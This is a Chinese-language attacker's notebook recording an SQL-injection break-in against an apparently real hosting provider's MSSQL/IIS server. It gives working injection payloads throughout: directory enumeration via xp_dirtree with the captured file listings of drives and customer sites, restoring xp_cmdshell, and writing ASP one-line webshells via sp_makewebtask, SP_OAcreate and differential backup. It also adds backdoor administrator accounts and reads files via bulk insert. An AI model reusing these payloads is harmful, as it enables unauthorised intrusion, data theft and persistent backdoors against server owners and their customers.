渗透某大型服务器的笔记,希望对一些人有用   (原创)

(不过,这是我自己笔记,所以好乱,没有整理,所以看得明就看吧!sorry)

------------

三是直接爆网站路径，再来个差异备份,但是很有效果。直捣黄龙。。很强大
爆路径语句
第一步：建立表
' ;drop table resina;create table resina([id] [int] identity (1,1) not null,[name] [nvarchar] (300) not null,[depth] [int] not null,[isfile] [nvarchar] (50) null);-- and '1'='1

-------------------
第二步：
' ;declare @z nvarchar(4000) set @z=0x63003a005c00 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意：0x63003a005c00 = C:\  为sql ENCODE  其他的自己找工具去转吧
' ;declare @z nvarchar(4000) set @z=0x64003a005c00 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意：0x63003a005c00 = d:\  为sql ENCODE  其他的自己找工具去转吧
' ;declare @z nvarchar(4000) set @z=0x65003a005c00 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意：0x63003a005c00 = e:\  为sql ENCODE  其他的自己找工具去转吧
' ;declare @z nvarchar(4000) set @z=0x66003a005c00 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意：0x63003a005c00 = f:\  为sql ENCODE  其他的自己找工具去转吧
' ;declare @z nvarchar(4000) set @z=0x67003a005c00 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意：0x63003a005c00 = g:\  为sql ENCODE  其他的自己找工具去转吧
--------------------------

第三步：暴出总数
' and (select cast(count(*) as varchar(8000))+char(94) from resina)>0-- and '1'='1

第四步：暴出文件名
' and 0<(select top 1 cast([isfile] as nvarchar(4000))+char(94)+cast([name] as nvarchar(4000)) from (select distinct top  1 * from resina order by isfile,name) t order by isfile desc,name desc)-- and '1'='1
修改中间红色的1，依次爆出。
' and 0<(select top 1 cast([isfile] as nvarchar(4000))+char(94)+cast([name] as nvarchar(4000)) from (select distinct top  2 * from resina order by isfile,name) t order by isfile desc,name desc)-- and '1'='1
-------------------------------
-------------------------------
d:\
Server]将 varchar 值 '42^' 转换为数据类型为
argh
hzhost
IIS_Monitor
MYOA
powereasy6.6
Program Files
RECYCLER
Serv-U_70sdjfsjdpwierpolsjdfiwyerisdfs
sqldata
System Volume Information
temp
wwwroot
wwwroot-2
常用SQL命令
1.txt
FlashMediaServer2.exe
hzcommon.dll
hzonlpay.dll
license.lic
setup.exe
sysdbftp.scr
--------------------------------
*************************************************
e:\
varchar 值 '16^' 转换为数据类型为 int

7i24.com
RECYCLER
soft
software
System Volume Information
TDDOWNLOAD
WinWebMail
WinWebMail.rar
***************************************
f:\
r]将 varchar 值 '16^' 转换为数据类型为 int 的列时发生语法错误。

AutoAT
RECYCLER
System Volume Information
SystemBacks
copy.txt
HttpMon.exe
HttpMon.ini
sysback.GHO

*************************************
然后转入渗透D盘

d:\

第一步：建立表123'
' ;drop table resina;create table resina([id] [int] identity (1,1) not null,[name] [nvarchar] (300) not null,[depth] [int] not null,[isfile] [nvarchar] (50) null);-- and '1'='1
-----------------------
' ;declare @z nvarchar(4000) set @z=0x64003a005c0077007700770072006f006f007400 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意：0x63003a005c00 = d:\wwwroot 为sql ENCODE  其他的自己找工具去转吧
' ;declare @z nvarchar(4000) set @z=0x64003a005c0077007700770072006f006f0074002d003200 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意：0x63003a005c00 = d:\wwwroot-2 为sql ENCODE  其他的自己找工具去转吧
' ;declare @z nvarchar(4000) set @z=0x64003a005c0068007a0068006f0073007400 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意：0x63003a005c00 = d:\hzhost 为sql ENCODE  其他的自己找工具去转吧
' ;declare @z nvarchar(4000) set @z=0x64003a005c0068007a0068006f00730074005c00770077007700 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意：0x63003a005c00 = d:\hzhost\www 为sql ENCODE  其他的自己找工具去转吧

------------------------------
第三步：暴出总数
' and (select cast(count(*) as varchar(8000))+char(94) from resina)>0-- and '1'='1

第四步：暴出文件名
' and 0<(select top 1 cast([isfile] as nvarchar(4000))+char(94)+cast([name] as nvarchar(4000)) from (select distinct top  1 * from resina order by isfile,name) t order by isfile desc,name desc)-- and '1'='1

-------------------------------
d:\hzhost
Server]将 varchar 值 '58^' 转换为数据类型为 int 的列时发生语法错误。
2008年8月新网接口升级共享平台模板文件'
2008年8月新网接口升级控制面板文件'
2008年8月新网接口升级主站文件'
backup
databases
hzhost_conpanel'
hzhost_mail'
hzhost_master'
hzhost_master2'
hzhost_master3'
hzhost_url'
hzhost6.52'
hzlog
MasterOnWeb
module
new_Temptest'
system
UPdata_down'
WebSystem
www
autotask.exe'
hzauto.exe'
HZcertC.exe'
hzclient.exe'
hzhost.exe'
hzhost_conpanel.rar'
hzpro.exe'
完整的6.5.2.0530版网页文件.rar'
注意事项.txt'
-------------------------------------------
d:\hzhost\www
Server]将 varchar 值 '46^' 转换为数据类型为 int 的列时发生语法错误。

images
inc
addini.asp
addini-sub.asp
admserver.asp
e.asp
infosafe.asa
infosafe.ini
ini.asp
ini.txt
login.as p
loginfo.asp
readini.asp
reg.htm
register-post.asp
sendallini.asp
sendini.asp
serveradd.asp
update.asp

升级说明.txt
使用说明.rtf

------------------------------------
d:\wwwroot-2

 varchar 值 '6^' 转换为数据类型为 int 的列时发生语法错误。
bbs
dh
fzl2008.mp3'

---------------------
d:\wwwroot
将 varchar 值 '1114^' 转换为数据类型为 int 的列时发生语法错误。

007ipcn
008idc
008idcweb
01022
0312web
05338
0735
111km1
123254846
13083563920
139e
17cool
1860288
1980ok
19dcomcn
1soon
21165
211crc
215594208
26idc
2868
313515
33207075
40050823
45094574----------------------1-50的
c20080806--------------201
caokaizhi
cc178
ccjsj2
cddjyftp---------209
eceo-----------301
elwwwsx
enic
eshikong
eyule-------------309
lajipp-------------501
lanbin123
lanf
langfang
langziknm---------509
------------------------------------------------
------------------------------------------------
d:\wwwroot\008idcweb
' ;declare @z nvarchar(4000) set @z=0x64003a005c0077007700770072006f006f0074005c00300030003800690064006300770065006200 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意：0x63003a005c00 = d:\wwwroot\008idcweb 为sql ENCODE  其他的自己找工具去转吧
 varchar 值 '8^' 转换为数据类型为 int 的列时发生语法错误

databases
logfiles
others
wwwroot
-------------------
d:\wwwroot\008idcweb\wwwroot
' ;declare @z nvarchar(4000) set @z=0x64003a005c0077007700770072006f006f0074005c003000300038006900640063007700650062005c0077007700770072006f006f007400 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意：0x63003a005c00 = d:\wwwroot\008idcweb\wwwroot 为sql ENCODE  其他的自己找工具去转吧

Server]将 varchar 值 '228^' 转换为数据类型为 int 的列时发生语法错误

008idc
adm
advs
aspnet_client
bbspic
catch
centgifts
company
control
count
cp
db
domain
down
eweb
face
form
hosting
images
includes
incs
js
language
link
mailbox
master
module
mpic
news
nusoap
onlinehelp
page
paycenter
pic
shop
taobao
taocan
templates
website
0.htm'
admin.php'
cart.php'
cart_domain.php'
cart_webdiy.php'
codeimg.php'
comment.php'
comment_detail.php'
comment_send.php'
config.inc.php'
domainsend.php'
download.php'
goodssearch.php'
index.html'
index.php'
license.php'
login.php'
loginform.php'
logout.php'
lostpass.php'
member.php'
member_account.php'
member_buylist.php'
member_centlist.php'
member_domain.php'
member_fabu.php'
member_gifts.php'
member_goods.php'
member_guanli.php'
member_guanli1.php'
member_lmadd.php'
member_lmlist.php'
member_modify.php'
member_modifyok.php'
member_mygoods.php'
member_myprod.php'
member_notice.php'
member_order.php'
member_order_detail.php'
member_order1.php'
member_ordermodipay.php'
member_ordermodirec.php'
member_ordermodiyun.php'
member_orderprint.php'
member_pay.php'
member_payaccount.php'
member_paylist.php'
member_prodpay.php'
member_site.php'
member_syspay.php'
mrss.php'
norights.php'
orderconfirm.php'
ordersend.php'
ordersendok.php'
paycheck.php'
paynotice.php'
payorder.php'
phpi.php'
pop.php'
reg.php'
regform.php'
regok.php'
regxy.php'
reload.php'
rss.php'
startorder.php'
stat.php'
supersearch.php'
systry.php'
systry_send.php'
test.php'
vote.php'
whois.php'
zlic.php'
-----------------------------------
d:\wwwroot\008idcweb\wwwroot\008idc
' ;declare @z nvarchar(4000) set @z=0x64003a005c0077007700770072006f006f0074005c003000300038006900640063007700650062005c0077007700770072006f006f0074005c00300030003800690064006300 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意：0x63003a005c00 = d:\wwwroot\008idcweb\wwwroot\008idc 为sql ENCODE  其他的自己找工具去转吧

]将 varchar 值 '6^' 转换为数据类型为 int 的列时发生语法错误。

class
html
main
-----------------
d:\wwwroot\008idcweb\wwwroot\008idc\main
' ;declare @z nvarchar(4000) set @z=00x64003a005c0077007700770072006f006f0074005c003000300038006900640063007700650062005c0077007700770072006f006f0074005c003000300038006900640063005c006d00610069006e00 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意：0x63003a005c00 = d:\wwwroot\008idcweb\wwwroot\008idc\main 为sql ENCODE  其他的自己找工具去转吧

----------------------------------------------------
 

d:\wwwroot\1soon   (通过查IP服务器,工程学得知,WEB地为:
' ;declare @z nvarchar(4000) set @z=0x64003a005c0077007700770072006f006f0074005c00310073006f006f006e00 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意：0x63003a005c00 = d:\wwwroot\1soon 为sql ENCODE  其他的自己找工具去转吧

varchar 值 '10^' 转换为数据类型为 int 的列时发生语法错误。

databases
logfiles
others
wwwroot
wwwroot1
-----------------------------
d:\wwwroot\1soon\wwwroot
' ;declare @z nvarchar(4000) set @z=0x64003a005c0077007700770072006f006f0074005c00310073006f006f006e005c0077007700770072006f006f007400 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意：0x63003a005c00 = d:\wwwroot\1soon\wwwroot 为sql ENCODE  其他的自己找工具去转吧

将 varchar 值 '80^' 转换为数据类型为 int 的列时发生语法错误。

agent
article
aspnet_client
buttonimage
control
css
dialog'
help
icpfiles
images
img
img1
incs
js
language
master'
members
news
pdtshw
style
sysimage
sysmod
yqljgl
管理员警告：代理平台专用主机禁止放非代理平台程序，如果您已经上传了其它非代理平台程序请立即自行清理，下次再发现将直接彻底删除.txt'
2.rar
denysite.asp'
Domain.asp'
DomainNameRegistration.asp'
favicon.ico'
hzhosthtml.htm'
index.html'
infmsg.asp'
loginblock.asp'
mst_error.asp'
mst_ok.asp'
pay.asp'
QQkefu.asp'
^sitemap.xml'
wangye.html'
youhuaseo.html'
------------------------
d:\wwwroot\1soon\wwwroot\js
' ;declare @z nvarchar(4000) set @z=0x64003a005c0077007700770072006f006f0074005c00310073006f006f006e005c0077007700770072006f006f0074005c006a007300 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意：0x63003a005c00 = d:\wwwroot\1soon\wwwroot\js 为sql ENCODE  其他的自己找工具去转吧

Server]将 varchar 值 '14^' 转换为数据类型为 int 的列时发生语法错误。

          
-------
*****************************
恢复XP_cmdshell
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')   // 判断xp_cmdshell扩展存储过程是否存在
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--              //恢复xp_cmdshell
' ;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
;exec master.dbo.xp_cmdshell 'echo ok >d:\wwwroot\1soon\wwwroot\js\resina.txt';--
*************************
利用sp_makewebtask这个存储过程写个马进去，
;exec%20sp_makewebtask%20'd:\zjkdj\zjkdj\zjkds\bake.asp,'%20select%20''<%25execute(request("a"))%25>''%20';--
' ;exec sp_makewebtask 'd:\wwwroot\1soon\wwwroot1\js\resina.asp',' select ''<%execute(request("oma"))%>'' ';--
*********************************
两个语句也是利用OACREAT调用wscript.shell和Shell.Application组件执行系统命令,
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\windows\system32\cmd.exe /c net localgroup administrators oma$ /add';--
' ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\windows\system32\cmd.exe /c echo ^<%execute(request("oma"))%^> >d:\wwwroot\1soon\wwwroot\js\resina.asp';--
----------
;DECLARE @shell INT EXEC SP_OAcreate 'Shell.Application',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user jxsaqjh 1234/add';--
' ;DECLARE @shell INT EXEC SP_OAcreate 'Shell.Application',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\windows\system32\cmd.exe /c echo ^<%execute(request("oma"))%^> >d:\wwwroot\1soon\wwwroot\js\resina1.asp';--
*********************************
复制文件   不成功
' ;declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'d:\\wwwroot\1soon\wwwroot\sitemap.xml' ,'d:\\wwwroot\1soon\wwwroot\js\sitemap.xml';--
******************************
[hzhost]   差异备份shell
' ;drop table [dbo].[cnctext]-- and '1'='1
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x72616D616461 backup database @a to --   //0x72616D616461为库名的16进制
' ;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x5b687a686f73745d backup database @a to -- and '1'='1  //[hzhost] = 0x5b687a686f73745d
;create table [dbo].[cnctext] ([oma] [image])--    cnctext为表名,oma为字段名  (可以先进行这一步  ;drop table [dbo].[cnctext] )
' ;create table [dbo].[cnctext] ([oma] [image])-- and '1'='1
;insert into cnctext(oma) values(0x3C2565786563757465287265717565737428226F6D61222929253E)--   //向表的字段里插入一句话木句,为16进制的    <%execute(request("oma"))%>
' ;insert into cnctext(oma) values(0x3C2565786563757465287265717565737428226F6D61222929253E)-- and '1'='1
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x433A5C776562726F6F745C52616D6164615C6861636B657235382E617370 backup database @a to WITH DIFFERENTIAL,FORMAT--       //对数据库进行差异备份,导出ASP木马,导出地址为:   16进制 = C:\webroot\Ramada\hacker58.asp
' ;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x64003a005c0077007700770072006f006f0074005c00310073006f006f006e005c0077007700770072006f006f0074005c006a0073005c0072006500730069006e0061002e00610073007000 backup database @a to WITH DIFFERENTIAL,FORMAT-- and '1'='1     //d:\wwwroot\1soon\wwwroot\js\resina.asp
' ;Drop table [cnctext]--      //删除此表
************************************
读文件里面的内容
declare @s varchar(4000) set @s=cast(0x64726f70207461626c6520666f6f666f6f666f6f3b435245415445205441424c45205b666f6f666f6f666f6f5d285b526573756c745478745d206e76617263686172283430303029204e554c4c293b62756c6b20696e73657274205b666f6f666f6f666f6f5d2066726f6d2027643a5c5c777777726f6f745c31736f6f6e5c777777726f6f74273b416c746572205461626c65205b666f6f666f6f666f6f5d2061646420696420696e74204e4f54204e554c4c204944454e544954592028312c31293b as varchar(4000));exec(@s)-- and 1=1
-----
折散,都试过,不成功
drop table foofoofoo;CREATE TABLE [foofoofoo]([ResultTxt] nvarchar(4000) NULL);bulk insert [foofoofoo] from 'd:\\wwwroot\1soon\wwwroot';Alter Table [foofoofoo] add id int NOT NULL IDENTITY (1,1);
' ;drop table [resina]--
' ;CREATE TABLE [resina]([ResultTxt] nvarchar(4000) NULL)--
' ;bulk insert [resina] from 'd:\\wwwroot\1soon\wwwroot\sitemap.xml'--
' ;Alter Table [resina] add id int NOT NULL IDENTITY (1,1)--
-----
' and (select cast(count(*) as varchar(8000))+char(94) from [hzhost]..[resina])>0--
' and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end from (select top 1 id,resulttxt from [resina] order by [id]) t order by [id] desc)>0--
****************************************